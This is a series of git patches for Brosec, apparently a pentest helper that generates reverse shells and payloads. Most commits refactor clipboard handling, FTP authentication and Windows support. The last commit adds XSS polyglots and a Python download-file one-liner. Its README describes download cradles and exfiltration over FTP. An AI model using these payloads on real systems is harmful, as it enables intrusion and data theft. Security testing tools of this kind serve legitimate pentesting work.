exports.cmd = function(input){ - - input = input.replace(/(\\')/gi,"'") - // TODO ^ do we need this? - //input = input.replace(/(@@)/gi,"\\") - - if (input.match(/(\\)/gi)){ - console.log(log.yellow('\n'+input+'\n')) - input = input.replace(/(\\)/gi,"\\\\") - } - else { - console.log(log.yellow('\n'+input+'\n')) - } - input = input.replace(/(\$)/gi,"\\\$") - input = input.replace(/(")/gi,"\\\"") - - var currentOS = os.type() - - if (currentOS === "Darwin"){ - exec("printf \"%s\" \""+input+"\"| pbcopy", print); - } - else if (currentOS === "Linux"){ - exec("printf \"%s\" \""+input+"\"| xsel -i -b", print); - } - else { - exec("echo \""+input+"\" | clip", print); - } - - console.log(log.green('Output copied to clipboard!')); + ncp.copy(input, function () { + console.log(log.green('Output copied to clipboard!')); + console.log(log.yellow('\n'+input+'\n')) + process.exit(1); + }) } exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, callback, tmenu){ @@ -55,7 +34,6 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call if(typeof(userResponse) === "string"){ payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, userResponse) - //payload = payload.replace(/(\\)/gi,"@@") } else { tmenu() return @@ -70,7 +48,6 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call payload = payload.replace(/((<(USER)\s*?.*?>))/gi, user) payload = payload.replace(/((<(PATH)\s*?.*?>))/gi, path) - payload = payload.replace(/(')/gi, "\\'") if(payload.match(/undefined/)){ warn() return false; diff --git a/modules/questionUser.js b/modules/questionUser.js index 182d3d6..ed0de5d 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -32,7 +32,11 @@ exports.http = function(callback) { exports.ncat = function(callback) { var port = db.getConfig("LPORT") - + if (!port){ + console.log(log.red("[!] Missing required variable LPORT")); + console.log("Have you tried the "+log.green("help")+" command?"); + return false; + } prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', @@ -58,6 +62,11 @@ exports.ncat = function(callback) { exports.ncatReceiveFile = function(callback) { var port = db.getConfig("LPORT"); + if (!port){ + console.log(log.red("[!] Missing required variable LPORT")); + console.log("Have you tried the "+log.green("help")+" command?"); + return false; + } var path = process.cwd()+"/"; var localFile = finalAnswer.replace(/(\/)/g, "_") diff --git a/package.json b/package.json index 5a42b61..d3ed2d8 100644 --- a/package.json +++ b/package.json @@ -26,7 +26,8 @@ "simple-git": "*", "ftpd": "*", "blessed": "*", - "js-htmlencode": "*" + "js-htmlencode": "*", + "copy-paste":"*" }, "author": "Gabe Marshall", "license": "ISC" From 35e76de096f2c26ee9d3bb66ffceffb4a1fed731 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Tue, 26 Jul 2016 16:31:25 -0400 Subject: [PATCH 09/18] Minor bug fix in encoder C-a apply method --- modules/encoder.js | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 883328e..0bcea74 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -3,7 +3,6 @@ var blessed = require("blessed"), htmlEncode = require('js-htmlencode').htmlEncode, htmlDecode = require('js-htmlencode').htmlDecode, outputValue = '', - justatest = '', counter = 0, keychanged = false; @@ -20,8 +19,10 @@ var modes = [{ } }, 'ENC': function(data) { - keychanged = false; - return encodeURIComponent(data); + keychanged = false; + var a = encodeURIComponent(data); + a = a.replace(/(')/g, "%27") + return a; }, 'title': 'URL' }, { @@ -192,6 +193,7 @@ exports.init = function(input) { modeTitle = setTitle(modes[counter]['title'], methodTitle); refreshScreen(); } + function toggleMode() { if (method === 'ENC') { method = 'DEC'; @@ -225,6 +227,16 @@ exports.init = function(input) { tHandler(); }) } + + function aHandler() { + this.init = inputBox.key('C-a', function(ch, key) { + inputBox.unkey('C-a'); + keypress = true; + inputBox.setValue(outputValue); + outputValue = encode(inputBox.getContent()); + refreshScreen(); + }) + } var inputBoxFocusHandler = function() { inputBox.key('C-c', function() { @@ -238,14 +250,9 @@ exports.init = function(input) { }) eHandler(); - tHandler(); + aHandler(); - inputBox.key('C-a', function(ch, key) { - inputBox.setValue(outputValue); - keychanged = true; - outputValue = encode(inputBox.getContent()); - }) inputBox.key('enter', function(ch, key) { From 47fbd6f4a2a26260f68cd73f189b323cd8c13012 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Tue, 26 Jul 2016 16:37:40 -0400 Subject: [PATCH 10/18] Minor performance improvements to encoder module --- modules/encoder.js | 25 +++---------------------- 1 file changed, 3 insertions(+), 22 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 0bcea74..b4a8ac3 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -21,7 +21,9 @@ var modes = [{ 'ENC': function(data) { keychanged = false; var a = encodeURIComponent(data); - a = a.replace(/(')/g, "%27") + a = a.replace(/(')/g, "%27"); + a = a.replace(/(\()/g, "%28"); + a = a.replace(/(\))/g, "%29"); return a; }, 'title': 'URL' @@ -128,11 +130,6 @@ exports.init = function(input) { fg: 'green' }, top: '12%', - // border: { - // type: 'bg', - // ch: '_', - // fg: "#27ea09" - // }, left: 'center', }) screen.append(list); @@ -253,7 +250,6 @@ exports.init = function(input) { tHandler(); aHandler(); - inputBox.key('enter', function(ch, key) { var command = inputBox.getValue(); @@ -276,21 +272,6 @@ exports.init = function(input) { }; inputBox.on('focus', inputBoxFocusHandler); - setTimeout(function() { - screen.render(); - }, 50) - - screen.key('tab', function(ch, key) { - if (inputBox.focused) { - list.focus(); - } else { - inputBox.focus(); - } - - screen.render(); - }); - - screen.key(['escape', 'q', 'C-c'], function(ch, key) { return process.exit(0); }); From e7638a2aa0e52ff24044eb1d47157b6a4d01c69e Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Wed, 27 Jul 2016 10:58:58 -0400 Subject: [PATCH 11/18] Fix in apply method MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The apply encoding output to the input field wasn’t working after being used once. This bug was fixed, and the menu description was changed a bit. --- modules/encoder.js | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index b4a8ac3..ec0f6ac 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -93,7 +93,7 @@ function setTitle(title, mode) { var a = log.cyanBright("a"); var t = log.cyanBright("t"); var ret = log.cyanBright("return"); - var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + " + e + "") + "\n(A)pply to input: " + log.blackBright("Ctrl + " + a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + " + t) + "\n\nPress " + ret + " to exit."; + var instructions = "\n\nChange (E)ncoding type: " + log.blackBright("Ctrl + " + e + "") + "\n(A)pply Output value to Input: " + log.blackBright("Ctrl + " + a) + " \n(T)oggle Encoding/Decoding: " + log.blackBright("Ctrl + " + t) + "\n\nPress " + ret + " to exit."; var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; return broTitle; } @@ -205,6 +205,12 @@ exports.init = function(input) { } refreshScreen(); } + + function applyMode() { + inputBox.setValue(outputValue); + outputValue = encode(inputBox.getContent()); + refreshScreen(); + } inputBox.focus(); function eHandler() { @@ -226,12 +232,11 @@ exports.init = function(input) { } function aHandler() { - this.init = inputBox.key('C-a', function(ch, key) { + this.init = inputBox.onceKey('C-a', function(ch, key) { inputBox.unkey('C-a'); keypress = true; - inputBox.setValue(outputValue); - outputValue = encode(inputBox.getContent()); - refreshScreen(); + applyMode(); + aHandler(); }) } var inputBoxFocusHandler = function() { From 700be0e6d3514b1d9492f0d1c9432ce31c35cbb9 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 14:46:00 -0400 Subject: [PATCH 12/18] Added auth to bros ftp --- bros | 13 +++------- modules/webserver/simpleFtp.js | 46 +++++++++++++++++++++++----------- 2 files changed, 35 insertions(+), 24 deletions(-) diff --git a/bros b/bros index 584ee77..7d48343 100755 --- a/bros +++ b/bros @@ -18,11 +18,6 @@ var firstArgument = argv._[0]; var secondArgument = argv._[1]; var thirdArgument = argv._[2]; - - - - - function getFirstArgValue(arg) { switch (arg) { case 1: @@ -95,11 +90,11 @@ function parseArgs() { utilities.update(); } else if (firstArgument === "ENCODE"){ if (secondArgument){ - utilities.encoder(oldSecondary); + utilities.encoder(oldSecondary); } else { utilities.encoder(); } - + } else if (firstArgument+" "+secondArgument === "SET LHOST" && !thirdArgument){ interfaces.setlhost(); @@ -109,10 +104,10 @@ function parseArgs() { } else if (firstArgument === "HELP") { check.allInputChecks(firstArgument, menu.mainMenu, menu.mainMenu); } else if (firstArgument === "CLEAN") { - child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ + child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ }); console.log("The Brosec database located at %s has been wiped.", settings.dbPath) - } + } else { check.allInputChecks(firstArgument, console.log, console.log) } diff --git a/modules/webserver/simpleFtp.js b/modules/webserver/simpleFtp.js index 68948ac..5a0396a 100644 --- a/modules/webserver/simpleFtp.js +++ b/modules/webserver/simpleFtp.js @@ -2,16 +2,19 @@ var ftpd = require('ftpd'); var fs = require('fs'); var path = require('path'); var log = require('../log.js'); -var keyFile; -var certFile; -var server; +var argv = require('yargs').argv; +var userArg = argv.username; +var passArg = argv.password; +var keyFile, certFile, server; var options = { host: process.env.IP || '127.0.0.1', port: process.env.PORT || 7002, tls: null, }; + var startFtpServer = function(protocol){ + console.log(" [!] WARNING: This ftp server is not intended to be secure and should be used with caution.\n") if (protocol === "ftps"){ console.log("ftps") options.tls = { @@ -44,33 +47,46 @@ var startFtpServer = function(protocol){ var username = null; console.log('client connected: ' + connection.remoteAddress); connection.on('command:user', function(user, success, failure) { - if (user) { - username = user; - success(); - } else { - failure(); - } + if (user) { + username = user; + success(); + } else { + failure(); + } }); connection.on('command:pass', function(pass, success, failure) { - if (pass) { - success(username); + if(!passArg){ + if (pass) { + success(username); + } else { + failure(); + } } else { - failure(); + if (pass === passArg){ + success(username); + } else { + failure(); + } } }); }); server.debugging = 4; - + ftpPort = options.port if (!ftpPort){ ftpPort = 2121; } - + server.listen(ftpPort); - console.log(" [*] An "+log.status("anonymous")+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)"); + var ftpType = " anonymous "; + if (userArg){ + ftpType = ""; + } + console.log(" [*] An"+log.status(ftpType)+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)"); + } From 0abcb7de21cdee5a93c362cd2c8f90f606f1f508 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 15:09:18 -0400 Subject: [PATCH 13/18] Fixes for better Windows support --- bros | 14 +++++++++++++- db/db.js | 18 +++++++++++------- 2 files changed, 24 insertions(+), 8 deletions(-) diff --git a/bros b/bros index 7d48343..a802e6f 100755 --- a/bros +++ b/bros @@ -3,6 +3,7 @@ var argv = require('yargs').argv, log = require('cli-color'), db = require('./db/db'), + os = require('os'), menu = require('./modules/menu'), secondaryMenu = require("./modules/secondaryMenu"), check = require('./modules/inputChecks'), @@ -104,7 +105,18 @@ function parseArgs() { } else if (firstArgument === "HELP") { check.allInputChecks(firstArgument, menu.mainMenu, menu.mainMenu); } else if (firstArgument === "CLEAN") { - child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ + + var currentOS = os.type(); + var cmd = "rm"; + var dir = settings.dbPath; + if (currentOS.match("Windows")){ + cmd = "del"; + var dir = os.tmpdir()+"\\bros.db"; + } else { + + } + + child_process.execFile(cmd, [dir], function(error, stdout, stderr){ }); console.log("The Brosec database located at %s has been wiped.", settings.dbPath) } diff --git a/db/db.js b/db/db.js index 820b5ac..a2ac3e0 100644 --- a/db/db.js +++ b/db/db.js @@ -1,10 +1,15 @@ var dirty = require('dirty'); -var settings = require('../settings.js') - +var settings = require('../settings.js'); +var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js try { - var db = dirty(settings.dbPath); + var currentOS = os.type(); + if (currentOS.match("Windows")){ + var db = dirty(os.tmpdir()+"\\bros.db"); + } else { + var db = dirty(settings.dbPath); + } } catch (err){ console.log("There was a problem initializing the bros. Check the settings.js file to specify a valid storage location.") @@ -19,7 +24,7 @@ exports.new = function(title, description){ } exports.newConfig = function(key, val){ - var keyExists = false + var keyExists = false db.forEach(function(keyStore, valStore) { if (key === keyStore){ keyExists = true @@ -33,7 +38,7 @@ exports.newConfig = function(key, val){ } else { db.set(key, val) - } + } db.on('drain', function() { }); } @@ -52,11 +57,10 @@ function getConfig(value){ } // If none exist else { - + } }); return test } exports.getConfig = getConfig; - From 1e36704bfdc14a28ab3cb86e41415c9afd9411b9 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 15:21:38 -0400 Subject: [PATCH 14/18] Fixed bug that was causing nc payloads to end prematurely --- modules/encoder.js | 2 +- modules/output.js | 6 ++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index ec0f6ac..4711014 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -265,7 +265,7 @@ exports.init = function(input) { screen.destroy(); setTimeout(function() { - output.cmd(outputValue); + output.cmd(outputValue, true); }, 50) inputBox.unkey('enter'); diff --git a/modules/output.js b/modules/output.js index af81bf4..0dfc055 100644 --- a/modules/output.js +++ b/modules/output.js @@ -12,11 +12,13 @@ var warn = function(){ },50) } -exports.cmd = function(input){ +exports.cmd = function(input, encoder){ ncp.copy(input, function () { console.log(log.green('Output copied to clipboard!')); console.log(log.yellow('\n'+input+'\n')) - process.exit(1); + if (encoder){ + process.exit(1); + } }) } From 3c75ff45c58826806dfcd0e442049485ce28f0a7 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 16:59:57 -0400 Subject: [PATCH 15/18] Minor fixes for Windows compatibility --- .gitignore | 1 - bros | 1 - db/db.js | 7 +------ package.json | 7 +++++-- settings.js | 17 ++++++++--------- 5 files changed, 14 insertions(+), 19 deletions(-) diff --git a/.gitignore b/.gitignore index 105265f..9c243fb 100644 --- a/.gitignore +++ b/.gitignore @@ -26,4 +26,3 @@ build/Release # https://www.npmjs.org/doc/misc/npm-faq.html#should-i-check-my-node_modules-folder-into-git node_modules bros.db -settings.js diff --git a/bros b/bros index a802e6f..38975f8 100755 --- a/bros +++ b/bros @@ -111,7 +111,6 @@ function parseArgs() { var dir = settings.dbPath; if (currentOS.match("Windows")){ cmd = "del"; - var dir = os.tmpdir()+"\\bros.db"; } else { } diff --git a/db/db.js b/db/db.js index a2ac3e0..60f5535 100644 --- a/db/db.js +++ b/db/db.js @@ -4,12 +4,7 @@ var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js try { - var currentOS = os.type(); - if (currentOS.match("Windows")){ - var db = dirty(os.tmpdir()+"\\bros.db"); - } else { - var db = dirty(settings.dbPath); - } + var db = dirty(settings.dbPath); } catch (err){ console.log("There was a problem initializing the bros. Check the settings.js file to specify a valid storage location.") diff --git a/package.json b/package.json index d3ed2d8..4ab82b7 100644 --- a/package.json +++ b/package.json @@ -1,8 +1,8 @@ { "name": "Brosec", - "version": "1.1.0", + "version": "1.1.1", "description": "Brosec - Pentest fu for bros", - "main": "bros.js", + "main": "bros", "repository": { "type": "git", "url": "git://github.com/gabemarshall/Brosec.git" @@ -10,6 +10,9 @@ "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, + "bin": { + "bros": "./bros" + }, "dependencies": { "cli-color": "*", "cli-table": "*", diff --git a/settings.js b/settings.js index d38c3d7..63c6c02 100644 --- a/settings.js +++ b/settings.js @@ -1,16 +1,15 @@ -var settings = {} +var settings = {}, + os = require('os'); // ---[Db Storage Path]--- // Brosec stores variable values using the nodejs dirty module -settings.dbPath = '/var/tmp/bros.db' - -// ---[netcat]--- -// (ex: ncat, netcat, nc.traditional) - -settings.netcat = "netcat" - - +var currentOS = os.type(); +if (currentOS.match("Windows")){ + settings.dbPath = dirty(os.tmpdir()+"\\bros.db"); +} else { + settings.dbPath = '/var/tmp/bros.db' +} module.exports = settings; From 77cb3be7721395dec97abb1942acf85bc7eae857 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 17:11:32 -0400 Subject: [PATCH 16/18] Changes to settings file --- db/db.js | 2 +- modules/questionUser.js | 2 +- settings.js => modules/settings.js | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename settings.js => modules/settings.js (99%) diff --git a/db/db.js b/db/db.js index 60f5535..8276a94 100644 --- a/db/db.js +++ b/db/db.js @@ -1,5 +1,5 @@ var dirty = require('dirty'); -var settings = require('../settings.js'); +var settings = require('./settings.js'); var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js diff --git a/modules/questionUser.js b/modules/questionUser.js index ed0de5d..e865430 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -2,7 +2,7 @@ var prompt = require('prompt'), os = require('os'), log = require('cli-color'), web = require("./webserver/webserver.js"), - settings = require('../settings.js'), + settings = require('./settings.js'), db = require('../db/db'), currentOS = os.type(), netcat = require('./nc'), diff --git a/settings.js b/modules/settings.js similarity index 99% rename from settings.js rename to modules/settings.js index 63c6c02..cc78dd6 100644 --- a/settings.js +++ b/modules/settings.js @@ -12,4 +12,6 @@ if (currentOS.match("Windows")){ settings.dbPath = '/var/tmp/bros.db' } + + module.exports = settings; From ddf778a8e6b4cfe333eac9600d8a3bcad9a86145 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 17:14:06 -0400 Subject: [PATCH 17/18] Fixed typo in settingsrequire statement --- bros | 2 +- db/db.js | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/bros b/bros index 38975f8..1f78909 100755 --- a/bros +++ b/bros @@ -10,7 +10,7 @@ var argv = require('yargs').argv, simpleWeb = require('./modules/webserver/simple.js'), simpleFtp = require('./modules/webserver/simpleFtp.js'), interfaces = require('./modules/interfaces'), - settings = require('./settings'), + settings = require('./modules/settings'), child_process = require('child_process'), utilities = require('./modules/utilities'), log = require('./modules/log.js'); diff --git a/db/db.js b/db/db.js index 8276a94..2aa0a85 100644 --- a/db/db.js +++ b/db/db.js @@ -1,5 +1,5 @@ var dirty = require('dirty'); -var settings = require('./settings.js'); +var settings = require('../modules/settings.js'); var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js From be2a0df68507040fe754668056a55d8dbb56ed45 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Sat, 30 Jul 2016 14:31:38 -0400 Subject: [PATCH 18/18] Release for v1.1.1 --- CHANGELOG.md | 20 ++++++++--- README.md | 76 ++++++++++++++-------------------------- modules/colorize.js | 29 +++++++++++---- modules/output.js | 10 +++++- modules/questionUser.js | 5 +-- modules/secondaryMenu.js | 2 +- payloads/misc.js | 5 +-- payloads/web.js | 38 ++++++++++++++++++-- payloads/windows.js | 3 +- 9 files changed, 117 insertions(+), 71 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index a5f5ab8..f810acf 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,21 +1,31 @@ # ChangeLog -## 1.1.0a _(July 23, 2016)_ +## Major Release 1.1.1 _(July 30, 2016)_ +- Features + - Full Windows Support added + - Better documentation added to the new [wiki](https://github.com/gabemarshall/Brosec/wiki) + - Simplified install process. Once you have nodejs installed just run ```npm install -g Brosec``` + - ```bros encode``` module added (realtime encoder/decoder) + - ```bros ftp``` now supports auth via ```--username``` and ```--password``` parameters. + - New SQLi Polyglots added to ```bros 43``` + - New XSS payloads ```bros 42``` + - (```bros 424``` Credit to [@0xsobky](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)) - Dependencies - - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) + - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) -- this greatly reduces the complexity of Brosec and makes it easier to install. - Bug fixes + - Lots and lots of bug fixes...and probably new bugs introduced ;p -## 0.2b _(Feb 16, 2016)_ +## 1.0.2b _(Feb 16, 2016)_ - Features - `bros update` - Convenience module that check for updates via git, pull if any updates are found, and installs any new dependencies. -## 0.2a _(Feb 15, 2016)_ +## 1.0.2a _(Feb 15, 2016)_ - Features - `bros clean` @@ -23,7 +33,7 @@ - Minor performance improvements throughout Brosec -## 0.2 _(Feb 5, 2016)_ +## 1.0.2 _(Feb 5, 2016)_ - Features - `bros ftp` diff --git a/README.md b/README.md index 6136595..a92a529 100644 --- a/README.md +++ b/README.md @@ -6,69 +6,53 @@ Overview (tl;dr) Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard. -Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as... +Assuming the user has already set up the required variables (see the [Getting Started](https://github.com/gabemarshall/Brosec/wiki/Getting-Started) section of the wiki) a reverse shell using the awk command can be generated as easy as... [![asciicast](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg.png)](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg) -#### Payload Variables +Or maybe you need to remotely invoke a Powershell script? A download cradle can be generated like so. -Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input. +[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc) -For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set). -[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc) +##### Additional Features and Usage Examples -##### Available variables -- LHOST : Local IP or name -- LPORT : Local IP or name -- RHOST : Remote IP or name -- RPORT : Remote IP or name -- USER : Username (only used in a few payloads) -- PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.) +###### [Bros http(s)](https://github.com/gabemarshall/Brosec/wiki/bros-http) +Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered. + +![](http://i.imgur.com/47BHim4.gif)
+###### [Bros FTP](https://github.com/gabemarshall/Brosec/wiki/bros-ftp) +Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running). -![](http://i.imgur.com/FCateZJ.gif) -
Above are multiple examples of how to access and set the stored configuration variables. -- Configuration variables can be viewed via the `config` command at any time, or by entering the variable name -- Variables can be changed at any time by entering `set ` -- You can also navigate to frequently used payloads by entering the menu sequence from the command line: `bros ` - - Ex: `bros 413` - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload -
+###### [Bros Encode](https://github.com/gabemarshall/Brosec/wiki/bros-encode) -
-##### Additional Features and Usage Examples -###### XXE for Bros -![](http://i.imgur.com/hxrqlvk.gif) -
-In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly. -

+A realtime encoder/decoder utility designed with web pentesters in mind that often find the need to encode and decode various payloads. + +![](http://i.imgur.com/wxFpA7o.png) + + +Learn about these features and more on the [Brosec wiki](https://github.com/gabemarshall/Brosec/wiki). -###### Simple HTTP(s) Server -Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered. -![](http://i.imgur.com/47BHim4.gif) -
-###### Anonymous FTP Server -Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running). Installation ============ ### [Releases](https://github.com/gabemarshall/Brosec/releases) -*Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec* -### Manual installation +### Mac + +#### Quick Installation -#### Mac +- `brew install node` - Install Nodejs (or download installer from https://nodejs.org/en/download/) +- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin) -- `brew install node` - Install Nodejs -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -- `cd Brosec && npm install` - cd into the directory and install npm depdendencies #### Kali Linux @@ -78,22 +62,13 @@ Installation - `n latest` Install latest version of nodejs -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -- `cd Brosec && npm install` - cd into the directory and install npm depdendencies +- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin) ### Windows (Unsupported) -- Install [nodejs](https://nodejs.org/download) -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - - -#### Optional -Add bros directory path to your PATH env variable, create a symlink for the bros file, etc - -Configuration -===================== +- Install via official installer [nodejs](https://nodejs.org/download) +- `npm install -g Brosec` - Install Brosec -Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Swag @@ -113,5 +88,6 @@ Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In additi - [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html) +- [SecLists](https://github.com/danielmiessler/SecLists) Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor) diff --git a/modules/colorize.js b/modules/colorize.js index 0079c24..ce0193d 100644 --- a/modules/colorize.js +++ b/modules/colorize.js @@ -2,7 +2,7 @@ var log = require('cli-color'); exports.samples = function(sample){ - var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/) + var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/gi) var doesSampleContainRemote = sample.match(/((<(RHOST)\s*?.*?>))/) var doesSampleContainRemotePort = sample.match(/((<(RPORT)\s*?.*?>))/) var doesSampleContainLocal = sample.match(/((<(LHOST)\s*?.*?>))/) @@ -10,14 +10,31 @@ exports.samples = function(sample){ var doesSampleContainUser = sample.match(/((<(USER)\s*?.*?>))/) var doesSampleContainPath = sample.match(/((<(PATH)\s*?.*?>))/) - function addSomeColor(val, color){ - var temp = sample.split(val[0]) - var final = temp[0]+color(val[0])+temp[1] + function replaceAll(str, find, replace) { + return str.replace(new RegExp(find, 'g'), replace); + } + + function addSomeColor(val, color, debug){ + + if (val.length > 1){ + for (b=0;b))/gi, userResponse) + var t = JSON.parse(userResponse) + if (t.length > 1){ + for (i=0;i))/i, t["+i+"])"); + } + } else { + payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, t[0]); + } + } else { tmenu() return diff --git a/modules/questionUser.js b/modules/questionUser.js index e865430..7d1fa9e 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -6,7 +6,7 @@ var prompt = require('prompt'), db = require('../db/db'), currentOS = os.type(), netcat = require('./nc'), - finalAnswer + finalAnswer = []; exports.http = function(callback) { prompt.message = "Should I fire up a web server for you? (Y/n) :" @@ -113,7 +113,7 @@ exports.some = function(question, callback, type) { if (err) { console.log(err); } else { - finalAnswer = result._; + finalAnswer.push(result._); temp += 1; } @@ -138,6 +138,7 @@ exports.some = function(question, callback, type) { clearInterval(checkStatus); // If the last question is a string, send output to final parsing if (typeof(question[temp - 1]) === "string") { + finalAnswer = JSON.stringify(finalAnswer); callback(finalAnswer); } } diff --git a/modules/secondaryMenu.js b/modules/secondaryMenu.js index 721d252..1f6702d 100644 --- a/modules/secondaryMenu.js +++ b/modules/secondaryMenu.js @@ -175,7 +175,7 @@ var Menu = function(title, menuOptions, payloadType) { var menus = {} var infoGMenu = new Menu("--[ Information Gathering ]--", ["DNS", "Port Scanning", "SMB", "SNMP"], pay.infog); -var webMenu = new Menu("--[ Web ]--",["XML", "SQLi"], pay.web) +var webMenu = new Menu("--[ Web ]--",["XML", "XSS", "SQLi"], pay.web) var miscMenu = new Menu('--[ Miscellaneous ]--', ["Reverse Shells", "Exfiltration"], pay.misc) var linuxMenu = new Menu('--[ Linux ]--', ["System Info", "File System", "Networking", "Stealth", "Privesc"], pay.linux) var windowsMenu = new Menu('--[ Windows ]--', ["System Info", "File System", "Networking", "WMIC", "Powershell", "Windows Registry"], pay.windows) diff --git a/payloads/misc.js b/payloads/misc.js index 174dcf1..84c66d5 100644 --- a/payloads/misc.js +++ b/payloads/misc.js @@ -112,10 +112,11 @@ Load({ Load({ title: "Download File via Python", - payload:'python -c \'import urllib;urllib.urlretrieve ("http://:/","");\'', + payload:'python -c \'import urllib;urllib.urlretrieve ("","");\'', category: "Exfiltration", callback: function(bro){ - question("What file would you like to download? (ex: script.sh)"); + question("What would you like to download? (ex: http://foo.bar/script.sh)"); + question("Where would you like to save it? (ex: /tmp/script.sh)"); ask.some(questions, bro); } }) diff --git a/payloads/web.js b/payloads/web.js index 8e06499..898333a 100644 --- a/payloads/web.js +++ b/payloads/web.js @@ -97,30 +97,62 @@ Load({ category: "XML" }) +// ####### XSS ########## + +Load({ payload: "'';!--\"=&{()}", title: "Test string to see how data is being filtered/escaped.", category: "XSS"}) +Load({ payload: "-->\">'>", title: "XSS Polyglot injecting into HTML", category: "XSS"}) +Load({ payload: "';alert(1)//\';alert(2)//\";alert(3)//\\\";alert(4)//-->\">'>=&{}", title: "XSS Polyglot injecting into JS", category: "XSS"}) + +// Credit to 